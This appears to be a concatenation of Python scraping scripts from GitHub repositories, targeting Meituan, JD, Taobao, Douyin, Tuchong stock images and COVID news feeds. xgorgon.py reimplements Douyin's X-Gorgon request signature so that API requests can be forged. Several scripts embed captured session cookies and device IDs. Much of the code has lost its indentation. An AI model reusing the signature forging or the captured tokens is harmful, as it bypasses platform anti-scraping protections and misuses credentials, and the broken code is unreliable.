"Cookie": "uuid=692a53319ce54d0c91f3.1597223761.1.0.0; ci=1; rvct=1; _lxsdk_cuid=173e1f47707c8-0dcd4ff30b4ae3-3323765-e1000-173e1f47707c8; _lxsdk_s=173e1f47708-21d-287-4d9%7C%7C35",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36"
}
def get_parse(url):
html = requests.get(url,headers = headers)
    if html.status_code == 200:
get_html(html)
else:
print(html.status_code)
def get_html(html):
content = html.text
    # shop name
titles= re.compile('","title":"(.*?)",',re.S|re.I)
title = titles.findall(content)
    # address
addresses = re.compile(',"address":"(.*?)",', re.S | re.I)
address = addresses.findall(content)
    # average rating
avgscores = re.compile(',"avgscore":(.*?),', re.S | re.I)
avgscore = avgscores.findall(content)
    # number of reviews
commentses = re.compile(',"comments":(.*?),', re.S | re.I)
comments = commentses.findall(content)
    # phone number
phones = re.compile('"phone":"(.*?)",', re.S | re.I)
phone = phones.findall(content)
    # average spend per person
df = pd.DataFrame()
df['店名'] = title
df['地址'] = address
df['评分'] = avgscore
df['评价人数'] = comments
df['联系电话'] = phone
df = df.drop_duplicates()
df = df.fillna('暂无数据')
    # avgscore is captured as text, so cast to float before binning into categories
    cut = lambda x: '一般' if x <= 3.5 else ('不错' if x <= 4.0 else ('好' if x <= 4.5 else '很好'))
    df["评分类型"] = df['评分'].astype(float).map(cut)
try:
df.to_csv("火锅信息.csv", mode="a+", header=None, index=None)
print("写入成功")
except:
print("当页数据写入失败")
time.sleep(1)
    # # set the font name so Chinese labels render
    # plt.rcParams['font.sans-serif'] = ['SimHei']
    # # stop the minus sign "-" from being drawn as a box when saving figures
    # plt.rcParams['axes.unicode_minus'] = False
# fig,axes = plt.subplots(2,1,figsize=(12,12))
# sns.regplot(x= "人均消费",y = "评分",data = df,color='r',marker="+",ax = axes[0])
# sns.regplot(x="评价人数", y="评分", data=df, color='g', marker="*", ax=axes[1])
if __name__ == '__main__':
    # In this URL the offset parameter grows by 32 per page, limit is the amount of data per request, q is the search keyword, and the 1 in poi/pcsearch/1 is the city id for Beijing.
for i in range(0,33,32):
url = "https://apimobile.meituan.com/group/v4/poi/pcsearch/1?uuid=692a53319ce54d0c91f3.1597223761.1.0.0&userid=-1&limit=32&offset={}&cateId=-1&q=%E7%81%AB%E9%94%85".format(i)
get_parse(url)
```
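The comment in `__main__` spells out what the query parameters mean; a hedged sketch that builds the same URL with urllib.parse.urlencode so the keyword, city id and offset are not hard-coded (parameter meanings follow that comment):

```python
from urllib.parse import urlencode

def search_url(keyword, offset, city_id=1, limit=32):
    """city_id 1 is Beijing per the comment above; offset advances by 32 per page."""
    params = {
        'uuid': '692a53319ce54d0c91f3.1597223761.1.0.0',  # value captured in the headers above
        'userid': -1,
        'limit': limit,
        'offset': offset,
        'cateId': -1,
        'q': keyword,
    }
    return 'https://apimobile.meituan.com/group/v4/poi/pcsearch/{}?{}'.format(city_id, urlencode(params))

# e.g. get_parse(search_url('火锅', 0))
```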
#### File: Crawl-Project2/美团爬取商家信息/paquxinxi.py
```python
import requests
import re
import json
headers = {
"Origin": "https://bj.meituan.com",
"Host": "apimobile.meituan.com",
"Referer": "https://bj.meituan.com/s/%E7%81%AB%E9%94%85/",
"Cookie": "uuid=692a53319ce54d0c91f3.1597223761.1.0.0; ci=1; rvct=1; _lxsdk_cuid=173e1f47707c8-0dcd4ff30b4ae3-3323765-e1000-173e1f47707c8; _lxsdk_s=173e1f47708-21d-287-4d9%7C%7C35",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36"
}
def get_parse(url):
html = requests.get(url,headers = headers)
    if html.status_code == 200:
get_html(html)
else:
print(html.status_code)
def get_html(html):
content = html.text
    # shop name
titles= re.compile('","title":"(.*?)",',re.S|re.I)
title = titles.findall(content)
    # address
addresses = re.compile(',"address":"(.*?)",', re.S | re.I)
address = addresses.findall(content)
    # average rating
avgscores = re.compile(',"avgscore":(.*?),', re.S | re.I)
avgscore = avgscores.findall(content)
    # number of reviews
commentses = re.compile(',"comments":(.*?),', re.S | re.I)
comments = commentses.findall(content)
    # phone number
phones = re.compile('"phone":"(.*?)",', re.S | re.I)
phone = phones.findall(content)
for i in range(len(title)):
try:
t = title[i]
a = address[i]
avg = avgscore[i]
c = comments[i]
p = phone[i]
print(t,a,avg,c,p)
dowload(t,a,avg,c,p)
except:
pass
def dowload(t,a,avg,c,p):
data = {
'店铺名称': t,
'店铺地址': a,
'店铺评分': avg,
'评价人数': c,
'电话': p
}
with open("美团信息.txt","a+",encoding="utf-8")as f:
f.write(json.dumps(data,ensure_ascii=False)+"\n")
print("写入成功")
if __name__ == '__main__':
    # In this URL the offset parameter grows by 32 per page, limit is the amount of data per request, q is the search keyword, and the 1 in poi/pcsearch/1 is the city id for Beijing.
for i in range(0,33,32):
url = "https://apimobile.meituan.com/group/v4/poi/pcsearch/1?uuid=692a53319ce54d0c91f3.1597223761.1.0.0&userid=-1&limit=32&offset={}&cateId=-1&q=%E7%81%AB%E9%94%85".format(i)
get_parse(url)
``` |
{
"source": "13060923171/order-receiving-project",
"score": 4
} |
#### File: order-receiving-project/data_and_templates/part1_template.py
```python
import numpy as np
import pandas as pd
def classify_prices(discount):
price_classification = [] # Change/remove this line
for d in discount:
if float(d) <= 0:
category = 'no_discount'
price_classification.append(category)
        elif 0 < float(d) <= 0.1:
category = 'discounted'
price_classification.append(category)
        elif 0.1 < float(d) <= 0.2:
category = 'good_deal'
price_classification.append(category)
else:
category = 'buy_now'
price_classification.append(category)
# Please, introduce your answer here
return price_classification
def calculate_discount(current, reference):
list_discount = []
for i in range(len(current)):
c = current[i]
r = reference[i]
discount = (r - c)/r
list_discount.append(discount)
return list_discount
def read_files(current_price_filename, reference_price_filename):
with open(current_price_filename,encoding='utf-8')as f:
data = np.loadtxt(f,delimiter=',')
with open(reference_price_filename, encoding='utf-8')as f:
data1 = np.loadtxt(f, delimiter=',')
    current = np.array(data, dtype=int) # Change/remove this line
    reference = np.array(data1, dtype=int) # Change/remove this line
# Please, introduce your answer here
return current, reference
def check_output(current, reference, discount, price_classification):
# Do not modify this function, it is provided only for you to check your answer
n_prices = len(discount)
print('----------------------------------------------')
print('P', 'current', 'ref', 'discount', 'classification', sep='\t')
print('----------------------------------------------')
for i in range(n_prices):
print(i, current[i],
reference[i],
str(np.round(discount[i], 2)) + '%',
price_classification[i], sep='\t')
if __name__ == '__main__':
current_price_filename = 'data/current_prices_example.csv' # You can change this value for testing
reference_price_filename = 'data/reference_prices_example.csv' # You can change this value for testing
# The lines below are provided to run your code in a similar order as
# will be done during marking and to help you check your answer.
current, reference = read_files(current_price_filename, reference_price_filename)
discount = calculate_discount(current, reference)
price_classification = classify_prices(discount)
# You can use the function below to check your answer only
# Please comment it for your submission
check_output(current, reference, discount, price_classification)
``` |
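The classify_prices() loop above maps each discount into one of four bands; the same thresholds (0, 0.1, 0.2) can also be expressed in vectorised form. A short sketch with pandas.cut, kept equivalent to the elif chain:

```python
import numpy as np
import pandas as pd

def classify_prices_vectorised(discount):
    bins = [-np.inf, 0.0, 0.1, 0.2, np.inf]  # (-inf, 0], (0, 0.1], (0.1, 0.2], (0.2, inf)
    labels = ['no_discount', 'discounted', 'good_deal', 'buy_now']
    return list(pd.cut(pd.Series(discount, dtype=float), bins=bins, labels=labels))
```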
{
"source": "13060923171/xianmu",
"score": 2
} |
#### File: xianmu/京东框架/Celery.py
```python
from celery import Celery
import requests,re,json
app = Celery(
'tasks',
backend='redis://127.0.0.1:6379/2',
broker='redis://127.0.0.1:6379/1',
)
headers = {
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36',
}
def get_id(url):
id = re.compile('\d+')
res = id.findall(url)
return res[0]
@app.task
def get_comm(url,comm_num):
    # holds the collected comment text
good_comments = ""
    # fetch the comments page by page
item_id = get_id(url)
pages = comm_num//10
if pages>99:
pages = 99
for page in range(0,pages):
comm_url = 'https://club.jd.com/comment/productPageComments.action?callback=fetchJSON_comment98&productId={}&score=0&sortType=5&page={}&pageSize=10&isShadowSku=0&rid=0&fold=1'.format(item_id,page)
headers['Referer'] = url
json_decode = requests.get(comm_url,headers = headers).text
try:
if json_decode:
start = json_decode.find('{"productAttr"')
end = json_decode.find('"afterDays":0}]}') + len('"afterDays":0}]}')
results = json.loads(json_decode[start:end])['comments']
for result in results:
content = result['content']
good_comments += "{}|".format(content)
except Exception as e:
pass
return item_id,good_comments
```
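A minimal sketch of how the task above might be driven from a client process, assuming the file is saved as Celery.py (as in the repo path) and the Redis broker/backend from the app configuration are running; the product URL and comment count below are placeholders:

```python
# In one shell, start a worker for the module above:
#   celery -A Celery worker --loglevel=info

from Celery import get_comm

# Queue the scrape and block until the worker returns the result.
async_result = get_comm.delay('https://item.jd.com/123456.html', 250)  # placeholder product URL
item_id, comments = async_result.get(timeout=600)
print(item_id, len(comments.split('|')))
```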
#### File: 抖音爬取签名,喜欢列表和关注列表/爬取抖音的用户信息和视频连接/xgorgon.py
```python
import hashlib
from urllib import request
import time
import gzip
byteTable1 ="D6 28 3B 71 70 76 BE 1B A4 FE 19 57 5E 6C BC 21 B2 14 37 7D 8C A2 FA 67 55 6A 95 E3 FA 67 78 ED 8E 55 33 89 A8 CE 36 B3 5C D6 B2 6F 96 C4 34 B9 6A EC 34 95 C4 FA 72 FF B8 42 8D FB EC 70 F0 85 46 D8 B2 A1 E0 CE AE 4B 7D AE A4 87 CE E3 AC 51 55 C4 36 AD FC C4 EA 97 70 6A 85 37 6A C8 68 FA FE B0 33 B9 67 7E CE E3 CC 86 D6 9F 76 74 89 E9 DA 9C 78 C5 95 AA B0 34 B3 F2 7D B2 A2 ED E0 B5 B6 88 95 D1 51 D6 9E 7D D1 C8 F9 B7 70 CC 9C B6 92 C5 FA DD 9F 28 DA C7 E0 CA 95 B2 DA 34 97 CE 74 FA 37 E9 7D C4 A2 37 FB FA F1 CF AA 89 7D 55 AE 87 BC F5 E9 6A C4 68 C7 FA 76 85 14 D0 D0 E5 CE FF 19 D6 E5 D6 CC F1 F4 6C E9 E7 89 B2 B7 AE 28 89 BE 5E DC 87 6C F7 51 F2 67 78 AE B3 4B A2 B3 21 3B 55 F8 B3 76 B2 CF B3 B3 FF B3 5E 71 7D FA FC FF A8 7D FE D8 9C 1B C4 6A F9 88 B5 E5"
def getXGon(url,stub,cookies):
NULL_MD5_STRING = "00000000000000000000000000000000"
sb=""
if len(url)<1 :
sb =NULL_MD5_STRING
else:
sb =encryption(url)
if len(stub)<1:
sb+=NULL_MD5_STRING
else:
sb+=stub
if len(cookies)<1:
sb+=NULL_MD5_STRING
else:
sb+=encryption(cookies)
index = cookies.index("sessionid=")
if index == -1:
sb+=NULL_MD5_STRING
else:
sessionid = cookies[index+10:]
if sessionid.__contains__(';'):
endIndex = sessionid.index(';')
sessionid = sessionid[:endIndex]
sb+=encryption(sessionid)
return sb
def encryption(url):
obj = hashlib.md5()
obj.update(url.encode("UTF-8"))
secret = obj.hexdigest()
return secret.lower()
def initialize(data):
myhex = 0
byteTable2 = byteTable1.split(" ")
for i in range(len(data)):
hex1 = 0
if i==0:
hex1= int(byteTable2[int(byteTable2[0],16)-1],16)
byteTable2[i]=hex(hex1)
# byteTable2[i] = Integer.toHexString(hex1);
elif i==1:
temp= int("D6",16)+int("28",16)
if temp>256:
temp-=256
hex1 = int(byteTable2[temp-1],16)
myhex = temp
byteTable2[i] = hex(hex1)
else:
temp = myhex+int(byteTable2[i], 16)
if temp > 256:
temp -= 256
hex1 = int(byteTable2[temp - 1], 16)
myhex = temp
byteTable2[i] = hex(hex1)
if hex1*2>256:
hex1 = hex1*2 - 256
else:
hex1 = hex1*2
hex2 = byteTable2[hex1 - 1]
result = int(hex2,16)^int(data[i],16)
data[i] = hex(result)
for i in range(len(data)):
data[i] = data[i].replace("0x", "")
return data
def handle(data):
for i in range(len(data)):
byte1 = data[i]
if len(byte1)<2:
byte1+='0'
else:
byte1 = data[i][1] +data[i][0]
if i<len(data)-1:
byte1 = hex(int(byte1,16)^int(data[i+1],16)).replace("0x","")
else:
byte1 = hex(int(byte1, 16) ^ int(data[0], 16)).replace("0x","")
byte1 = byte1.replace("0x","")
a = (int(byte1, 16) & int("AA", 16)) / 2
a = int(abs(a))
byte2 =((int(byte1,16)&int("55",16))*2)|a
byte2 = ((byte2&int("33",16))*4)|(int)((byte2&int("cc",16))/4)
byte3 = hex(byte2).replace("0x","")
if len(byte3)>1:
byte3 = byte3[1] +byte3[0]
else:
byte3+="0"
byte4 = int(byte3,16)^int("FF",16)
byte4 = byte4 ^ int("14",16)
data[i] = hex(byte4).replace("0x","")
return data
def xGorgon(timeMillis,inputBytes):
data1 = []
data1.append("3")
data1.append("61")
data1.append("41")
data1.append("10")
data1.append("80")
data1.append("0")
data2 = input(timeMillis,inputBytes)
data2 = initialize(data2)
data2 = handle(data2)
for i in range(len(data2)):
data1.append(data2[i])
xGorgonStr = ""
for i in range(len(data1)):
temp = data1[i]+""
if len(temp)>1:
xGorgonStr += temp
else:
xGorgonStr +="0"
xGorgonStr+=temp
return xGorgonStr
def input(timeMillis,inputBytes):
result = []
for i in range(4):
if inputBytes[i]<0:
temp = hex(inputBytes[i])+''
temp = temp[6:]
result.append(temp)
else:
temp = hex(inputBytes[i]) + ''
result.append(temp)
for i in range(4):
result.append("0")
for i in range(4):
if inputBytes[i+32]<0:
            result.append((hex(inputBytes[i + 32]) + '')[6:])
else:
result.append(hex(inputBytes[i + 32]) + '')
for i in range(4):
result.append("0")
tempByte = hex(int(timeMillis))+""
tempByte = tempByte.replace("0x","")
for i in range(4):
a = tempByte[i * 2:2 * i + 2]
result.append(tempByte[i*2:2*i+2])
for i in range(len(result)):
result[i] = result[i].replace("0x","")
return result
def strToByte(str):
length = len(str)
str2 = str
bArr =[]
i=0
while i < length:
# bArr[i/2] = b'\xff\xff\xff'+(str2hex(str2[i]) << 4+str2hex(str2[i+1])).to_bytes(1, "big")
a = str2[i]
b = str2[1+i]
c = ((str2hex(a) << 4)+str2hex(b))
bArr.append(c)
i+=2
return bArr
def str2hex(s):
odata = 0
su =s.upper()
for c in su:
tmp=ord(c)
if tmp <= ord('9') :
odata = odata << 4
odata += tmp - ord('0')
elif ord('A') <= tmp <= ord('F'):
odata = odata << 4
odata += tmp - ord('A') + 10
return odata
def doGetGzip(url,headers,charset):
req = request.Request(url)
for key in headers:
req.add_header(key,headers[key])
with request.urlopen(req) as f:
data = f.read()
return gzip.decompress(data).decode()
def douyin_xgorgon(url,cookies,xtttoken):
ts = str(time.time()).split(".")[0]
_rticket = str(time.time() * 1000).split(".")[0]
params = url[url.index('?')+1:]
STUB = ""
s = getXGon(params,STUB,cookies)
gorgon = xGorgon(ts,strToByte(s))
headers={
"X-Gorgon":gorgon,
"X-Khronos": ts,
"sdk-version":"1",
"Cookie": cookies,
"Accept-Encoding": "gzip",
"X-SS-REQ-TICKET": _rticket,
"Host": "aweme.snssdk.com",
"Connection": "Keep-Alive",
'User-Agent': 'okhttp/3.10.0.1',
"x-tt-token":xtttoken
}
return headers
```
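A minimal usage sketch of the signing helper above. The API URL, cookie string and token below are placeholders (assumptions), not working values; in practice they come from a packet capture of the app:
```python
# Hypothetical call of douyin_xgorgon: all values below are placeholders.
import requests

api_url = ("https://aweme.snssdk.com/aweme/v1/aweme/post/"
           "?sec_user_id=PLACEHOLDER&count=10&max_cursor=0")
cookie_str = "odin_tt=xxxx; sessionid=yyyy"   # captured with a proxy such as Fiddler
x_tt_token = ""                               # empty when the account is not logged in

signed_headers = douyin_xgorgon(api_url, cookie_str, x_tt_token)
resp = requests.get(api_url, headers=signed_headers, verify=False)
print(resp.status_code)
```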
#### File: xianmu/爬取抖音无水印视频/douying.py
```python
import requests
'''
GET https://api3-core-c-hl.amemv.com/aweme/v1/aweme/post/?source=0&publish_video_strategy_type=0&max_cursor=1587528101000&sec_user_id=MS4wLjABAAAA4s3jerVDPUA_xvyoGhRypnn8ijAtUfrt9rCWL2aXxtU&count=10&ts=1587635299&host_abi=armeabi-v7a&_rticket=1587635299508&mcc_mnc=46007& HTTP/1.1
Host: api3-core-c-hl.amemv.com
Connection: keep-alive
Cookie: odin_tt=fab0188042f9c0722c90b1fbaf5233d30ddb78a41267bacbfc7c1fb216d37344df795f4e08e975d557d0c274b1c761da039574e4eceaae4a8441f72167d64afb
X-SS-REQ-TICKET: 1587635299505
sdk-version: 1
X-SS-DP: 1128
x-tt-trace-id: 00-a67026290de17aa15402ce8ee4a90468-a67026290de17aa1-01
User-Agent: com.ss.android.ugc.aweme/100801 (Linux; U; Android 5.1.1; zh_CN; MI 9; Build/NMF26X; Cronet/TTNetVersion:8109b77c 2020-04-15 QuicVersion:0144d358 2020-03-24)
X-Gorgon: 0404c0d100004fe124c18b36d03baf0768c181e105b1af5e8167
X-Khronos: 1587635299
x-common-params-v2: os_api=22&device_platform=android&device_type=MI%209&iid=78795828897640&version_code=100800&app_name=aweme&openudid=80c5f2708a3b6304&device_id=3966668942355688&os_version=5.1.1&aid=1128&channel=tengxun_new&ssmix=a&manifest_version_code=100801&dpi=320&cdid=e390170c-0cb5-42ad-8bf6-d25dc4c7e3a3&version_name=10.8.0&resolution=900*1600&language=zh&device_brand=Xiaomi&app_type=normal&ac=wifi&update_version_code=10809900&uuid=863254643501389
'''
# Video-download helper: save each Douyin video to a local .mp4 file
def download_video(url, title):
with open("{}.mp4".format(title), "wb") as f:
f.write(requests.get(url).content)
print("下载视频{}完毕".format(title))
#How to crawl the videos inside the app
def get_video():
    #The URL listing all videos of a given account is captured with the Fiddler packet-capture tool
url = "https://api3-core-c-hl.amemv.com/aweme/v1/aweme/post/?source=0&publish_video_strategy_type=0&max_cursor=1587528101000&sec_user_id=MS4wLjABAAAA4s3jerVDPUA_xvyoGhRypnn8ijAtUfrt9rCWL2aXxtU&count=10&ts=1587635299&host_abi=armeabi-v7a&_rticket=1587635299508&mcc_mnc=46007&"
    #Build the headers; all of these values are taken from the Fiddler capture
headers = {
'Cookie': 'odin_tt=fab0188042f9c0722c90b1fbaf5233d30ddb78a41267bacbfc7c1fb216d37344df795f4e08e975d557d0c274b1c761da039574e4eceaae4a8441f72167d64afb',
'X-SS-REQ-TICKET': '1587635299505',
'sdk-version': '1',
'X-SS-DP': '1128',
'x-tt-trace-id': '00-a67026290de17aa15402ce8ee4a90468-a67026290de17aa1-01',
'User-Agent': 'com.ss.android.ugc.aweme/100801 (Linux; U; Android 5.1.1; zh_CN; MI 9; Build/NMF26X; Cronet/TTNetVersion:8109b77c 2020-04-15 QuicVersion:0144d358 2020-03-24)',
'X-Gorgon': '0404c0d100004fe124c18b36d03baf0768c181e105b1af5e8167',
'X-Khronos': '1587635299',
'x-common-params-v2': 'os_api=22&device_platform=android&device_type=MI%209&iid=78795828897640&version_code=100800&app_name=aweme&openudid=80c5f2708a3b6304&device_id=3966668942355688&os_version=5.1.1&aid=1128&channel=tengxun_new&ssmix=a&manifest_version_code=100801&dpi=320&cdid=e390170c-0cb5-42ad-8bf6-d25dc4c7e3a3&version_name=10.8.0&resolution=900*1600&language=zh&device_brand=Xiaomi&app_type=normal&ac=wifi&update_version_code=10809900&uuid=863254643501389'
}
    #Send the request without certificate verification
html = requests.get(url, headers=headers, verify=False)
    #Parse the JSON response and take the video list
json_data = html.json()["aweme_list"]
    #Iterate over the items and print each one
for j in json_data:
title = j['desc']
print(title)
print(j['video']['play_addr']['url_list'][0])
        #Print the playback URL of each video, then download them all with the helper function above
download_video(j['video']['play_addr']['url_list'][0], title)
if __name__ == '__main__':
get_video()
```
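The captured endpoint only returns one page of posts; a hedged sketch of how the code above could follow the paging fields is given below. The field names `has_more` and `max_cursor` are assumptions based on typical captures of this endpoint, not verified here:
```python
# Hypothetical pagination sketch, reusing requests, headers and download_video from above.
def get_all_videos(url_template, headers):
    # url_template is the captured URL with "max_cursor={}" left as a placeholder
    max_cursor = 0
    while True:
        data = requests.get(url_template.format(max_cursor),
                            headers=headers, verify=False).json()
        for item in data.get("aweme_list", []):
            download_video(item['video']['play_addr']['url_list'][0], item['desc'])
        if not data.get("has_more"):      # assumed field name
            break
        max_cursor = data.get("max_cursor", 0)  # assumed field name
```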
#### File: xianmu/爬取淘宝商品信息基于selenium框架/taobao.py
```python
import requests
import re
from urllib import parse
headers = {
"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36",
"referer": "https://tb.alicdn.com/snapshot/index.html",
'cookie': 't=884491259d4aed9aac3cd83e5798c433; cna=UU81Fxb46woCAWUv7c0BLoMd; sgcookie=ERElHyZEXq%2FBxbIAKkMLf; tracknick=%5Cu53F6%5Cu95EE%5Cu8C01%5Cu662F%5Cu8FB0%5Cu5357; _cc_=V32FPkk%2Fhw%3D%3D; enc=UvoaKN2E%2F5qKScgssIA7s34lg2c%2B7mFKY6bD58vrwGvLTZKDyYj7UQ0p3hGnXJK11f8JrZT5ky54YNi0i73Few%3D%3D; tfstk=cIOdBdvB3cmha_TF3QHGFR3VyY-dafFd2ys4w4-E6MTnQmN8NsxviIpfnv_Yv13O.; thw=cn; hng=CN%7Czh-CN%7CCNY%7C156; cookie2=1165897f57a1ed424d42db9d3a99ff7d; v=0; _tb_token_=<PASSWORD>; alitrackid=tb.alicdn.com; lastalitrackid=tb.alicdn.com; JSESSIONID=42FB5C5D5D65C270436BAF43224830CB; isg=BPb2H7f2tUx9pkBnqiw8IaAaRyz4FzpR25dtfWDcO1mro5U9yaZ-YfUau3_PPzJp; l=eBTUSTCcQZnRM5Q_BO5alurza77TaQdf1nVzaNbMiInca6TFta8TVNQqOBKvSdtjgt5j2eKrb3kJjRhM8W4LRjkDBeYBRs5mpfpp8e1..',
}
keyword = input("请输入你要搜索的信息:")
def get_parse(url):
html = requests.get(url,headers= headers)
if html.status_code ==200:
print('页面正常')
get_html(html)
else:
print(html.status_code)
def get_html(html):
    #Use regular expressions to extract the item name, price, shop name and shop location
content = html.text
    #Locate the item name
names = re.compile('"raw_title":"(.*?)"', re.I | re.S)
name = names.findall(content)
    #Locate the price
prices = re.compile('"view_price":"(.*?)"',re.I|re.S)
price = prices.findall(content)
    #Locate the shop name
nicks = re.compile('"nick":"(.*?)"',re.I|re.S)
nick = nicks.findall(content)
    #Locate the shop location
item_locs = re.compile('"item_loc":"(.*?)"', re.I | re.S)
item_loc= item_locs.findall(content)
    #Use the number of regex matches to drive the loop and print name, price, shop and location in order
for j in range(len(name)):
print('商品名称:{}\n价格:{}\n商家名称:{}\n商家位置:{}\n'.format(name[j], price[j], nick[j], item_loc[j]))
if __name__ == '__main__':
for i in range(0,45,44):
url = 'https://s.taobao.com/search?q={}&imgfile=&commend=all&ssid=s5-e&' \
'search_type=item&sourceId=tb.index&spm=a21bo.2017.201856-taobao-item.1&' \
'ie=utf8&initiative_id=tbindexz_20170306&bcoffset=1&ntoffset=1&p4ppushleft=2%2C48&s={}'.format(parse.quote(keyword),i)
get_parse(url)
```
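Since `get_html` only prints the matches, a small optional extension (a sketch, not part of the original script) could collect the rows and write them to a CSV file with the standard library:
```python
# Hypothetical extension: persist the parsed fields instead of only printing them.
import csv

def save_rows(rows, path="taobao_items.csv"):
    with open(path, "w", newline="", encoding="utf-8-sig") as f:
        writer = csv.writer(f)
        writer.writerow(["name", "price", "shop", "location"])
        writer.writerows(rows)

# Inside get_html one could append (name[j], price[j], nick[j], item_loc[j])
# to a list for each match and pass that list to save_rows afterwards.
```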
#### File: 抓取百度文库所有内容/paqu-ppt/pdf.py
```python
import requests
from selenium import webdriver
from lxml import etree
import re
from selenium.webdriver.common.keys import Keys
import time
from PIL import Image
import os
from bs4 import BeautifulSoup
from docx import Document
import sys
#Helper that fetches the page first
def get_html(url):
try:
        #Guard the request with try/except and fetch the page with a GET request
r = requests.get(url,headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.62 Safari/537.36"})
        #Set the response encoding to the apparent (detected) encoding of the content,
        # so no specific charset has to be hard-coded; the content's own encoding is used
r.encoding = r.apparent_encoding
        #Return the content as text
return r.text
except:
print("URL request error")
```
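The file imports BeautifulSoup but the excerpt stops after `get_html`; a hedged sketch of how the fetched page might be parsed next is shown below. The tag selector is a placeholder, not the selector used by the original project:
```python
# Hypothetical next step: parse the page returned by get_html.
def parse_page(url):
    html = get_html(url)
    if html is None:
        return []
    soup = BeautifulSoup(html, "html.parser")
    # Placeholder selector: collect the text of every <p> tag.
    return [p.get_text(strip=True) for p in soup.find_all("p")]
```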
#### File: xianmu/破解千图批量下载图片/paqutupian.py
```python
import requests
import os
import re
#Regular expression that extracts the image id
imageID = re.compile('"imageId":"(.*?)"')
#Build the request headers
headers= {
"Accept-Encoding":"",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.62 Safari/537.36"
}
#Fetch the images on this page and save them
def get_page():
url = "https://stock.tuchong.com/topic?topicId=49390"
html = requests.get(url)
result = imageID.findall(html.text)
for r in result:
        #Every image URL has the same format and only the id differs, so the id alone is enough to build the image URL
imgurl = "https://icweiliimg9.pstatp.com/weili/l/{}.jpg".format(r)
name = str(r)
downloadImg(imgurl,name)
#Helper that saves an image to disk
def downloadImg(url:str,name:str) ->None:
if not os.path.exists("./图虫"):
os.mkdir("./图虫")
print("正在下载图片,ID:"+name)
with open("./图虫/{}.jpg".format(name),"wb") as f:
        #Save the image by downloading its URL
f.write(requests.get(url,headers=headers).content)
if __name__ == '__main__':
get_page()
```
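The topic id is hard-coded in `get_page`; a small parameterised variant (a sketch reusing `headers`, `imageID` and `downloadImg` from above) makes the same logic reusable for other topic pages:
```python
# Hypothetical parameterised variant of get_page.
def get_topic(topic_id):
    url = "https://stock.tuchong.com/topic?topicId={}".format(topic_id)
    html = requests.get(url, headers=headers)
    for r in imageID.findall(html.text):
        downloadImg("https://icweiliimg9.pstatp.com/weili/l/{}.jpg".format(r), str(r))

# get_topic(49390)
```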
#### File: xianmu/获取新冠肺炎实时数据/paqufeiyang.py
```python
import requests
from lxml import etree
import json
import time
import threading
headers = {
"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.62 Safari/537.36"
}
News_set = set()
#Single-thread version: fetch real-time COVID-19 data from NetEase News
def getData():
url = "https://wp.m.163.com/163/page/news/virus_report/index.html?_nw_=1&_anw_=1"
html = requests.get(url,headers=headers)
soup = etree.HTML(html.text)
    #First extract the relevant fields, here the update time and the figures
current_time =soup.xpath('//div[@class = "cover_time"]/text()')[0]
cover_data = soup.xpath('//div[@class = "cover_data_china"]/div[starts-with(@class,"cover")]')
    #Start an infinite loop
while 1:
        #Keep reporting so the data stays up to date
for cover in cover_data:
title = cover.xpath('h4/text()')[0]
number = cover.xpath('div[@class = "number"]/text()')[0]
result = current_time+" "+title+" "+ number
if result not in News_set:
News_set.add(result)
print(result,end=" ")
        #Poll every 60 seconds
time.sleep(60)
#Multi-thread version: real-time COVID-19 data from Baidu
def getNews():
url = "https://opendata.baidu.com/data/inner?tn=reserved_all_res_tn&dspName=iphone&from_sf=1&dsp=iphone&resource_id=28565&alr=1&query=%E8%82%BA%E7%82%8E&cb=jsonp_1588237477067_8878"
html = requests.get(url,headers=headers)
html_text = html.text
    #Find where the JSON payload starts
start = html_text.find('{"ResultCode"')
    #Find where the JSON payload ends
end = html_text.find(r'recall_srcids\u0000\u0000"}')+len(r'recall_srcids\u0000\u0000"}')
    #Slice out the JSON string and parse it into a Python object
json_data = json.loads(html_text[start:end])
    #Locate the latest items inside the JSON
data_new = json_data['Result'][0]["DisplayData"]["result"]['items']
    #Loop forever to keep reporting updates
while 1:
for data in data_new:
new_title = data["eventDescription"]
new_time = data["eventTime"]
new_url = data['eventUrl']
local_time = time.localtime(int(new_time))
current_time = time.strftime("%Y-%m-%d %H-%M-%S",local_time)
result = new_title+current_time+" "+new_url
if result not in News_set:
News_set.add(result)
print(result)
time.sleep(60)
def xingXi():
    print("新冠肺炎情况:")
    #Start the Baidu real-time feed in a background thread
    print("百度提供实时新闻")
    threading.Thread(target=getNews, daemon=True).start()
    #Run the NetEase real-time feed in the main (single) thread
    print("实时新闻:")
    getData()
if __name__ == '__main__':
xingXi()
``` |
{
"source": "1306298019/YOLOV4",
"score": 3
} |
#### File: 1306298019/YOLOV4/mosaic.py
```python
from PIL import Image, ImageDraw
import numpy as np
from matplotlib.colors import rgb_to_hsv, hsv_to_rgb
import math
def rand(a=0, b=1):
return np.random.rand()*(b-a) + a
def merge_bboxes(bboxes, cutx, cuty):
merge_bbox = []
for i in range(len(bboxes)):
for box in bboxes[i]:
tmp_box = []
x1,y1,x2,y2 = box[0], box[1], box[2], box[3]
if i == 0:
if y1 > cuty or x1 > cutx:
continue
if y2 >= cuty and y1 <= cuty:
y2 = cuty
if y2-y1 < 5:
continue
if x2 >= cutx and x1 <= cutx:
x2 = cutx
if x2-x1 < 5:
continue
if i == 1:
if y2 < cuty or x1 > cutx:
continue
if y2 >= cuty and y1 <= cuty:
y1 = cuty
if y2-y1 < 5:
continue
if x2 >= cutx and x1 <= cutx:
x2 = cutx
if x2-x1 < 5:
continue
if i == 2:
if y2 < cuty or x2 < cutx:
continue
if y2 >= cuty and y1 <= cuty:
y1 = cuty
if y2-y1 < 5:
continue
